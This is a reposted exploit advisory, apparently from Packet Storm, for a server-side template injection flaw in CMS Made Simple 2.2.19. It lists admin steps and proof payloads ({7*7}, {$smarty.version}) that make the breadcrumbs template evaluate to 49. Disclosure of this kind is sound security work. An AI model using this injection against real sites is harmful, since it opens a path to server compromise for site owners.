CMS Made Simple 2.2.19 Server-Side Template Injection
2024-2-22 23:9:39 Author: packetstormsecurity.com(查看原文) 阅读量:24 收藏

# Exploit Title: CMS Made Simple Version: 2.2.19 - SSTI
# Date: 2024-21-02
# Exploit Author: tmrswrr
# Vendor Homepage: https://www.cmsmadesimple.org/
# Version: 2.2.19
# Tested on: https://www.softaculous.com/demos/CMS_Made_Simple

1 ) log in as admin and go to Layout > Design Manager > Breadcrumbs
2 ) Click edit and write SSTI payload : {7*7} , {$smarty.version},{{7*7}}
3 ) After click Apply > Submit
4 ) Go to home page > https://127.0.0.1/CMS_Made_Simple/index.php?page=templates-and-stylesheets
will be see : 49 class="breadcrumbs"


文章来源: https://packetstormsecurity.com/files/177244/cmsmadesimple2219-ssti.txt
如有侵权请联系:admin#unsafe.sh